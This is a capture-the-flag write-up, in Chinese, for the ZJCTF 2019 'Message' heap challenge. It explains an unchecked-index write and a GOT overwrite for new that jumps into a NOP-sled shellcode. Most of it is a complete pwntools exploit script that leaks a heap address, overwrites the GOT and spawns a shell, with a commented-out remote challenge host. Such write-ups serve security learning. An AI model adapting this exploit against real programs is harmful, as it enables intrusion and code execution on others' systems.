[ZJCTF 2019]Mesage(地址值強制當成指令)
首先,檢查一下程序的保護機制
然後,我們用IDA分析一下,在edit功能裏沒有檢查index,可以溢出,在任意地址處寫一個堆地址。
那麼,我們就可以把堆地址寫到已存在的堆裏,然後調用show就能打印出堆地址,然後,我們計算new的got表到堆地址之間的偏移,將new的got表改爲一個堆地址。但是這個堆地址裏面開始並不是存放shellcode,而是存放着一個堆指針。
通過構造堆,讓堆末尾的地址爲0xE8,這樣,就可以解決問題了,因爲0xE8強制轉爲指令就是這樣
因此,我們只要在後方申請一個很大的堆,並在前方大片空間裏填充nop,那麼就一定可以滑行到主shellcode裏
#coding:utf8
from pwn import *
context(os='linux',arch='amd64')
sh = process('./message1')
#sh = remote('node3.buuoj.cn',25086)
new_got = 0x00000000006040F0
def add(count,string):
sh.sendlineafter('>>','1')
sh.sendlineafter('add?',str(count))
for i in range(count):
sh.sendlineafter('message',string)
def delete(index):
sh.sendlineafter('>>','2')
sh.sendlineafter('index:',str(index))
def show():
sh.sendlineafter('>>','3')
def edit(index,count,string):
sh.sendlineafter('>>','4')
sh.sendlineafter('index:',str(index))
sh.sendlineafter('add?',str(count))
for i in range(count):
sh.sendlineafter('message',string)
add(1,'a'*0x8)
edit(-3,1,'a'*0x8)
show()
sh.recvuntil('0:')
sh.recvuntil('0:')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
offset = (heap_addr - 0x20 - new_got) / 8
edit(0,4,'\x00'*0x18)
edit(0,1,'\x00'*0x18)
#new_got->chunk1[call xxx]->chunk2
edit(-1*offset,1,(asm(shellcraft.sh())).rjust(0x10000,'\x90'))
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('add?','1')
sh.interactive()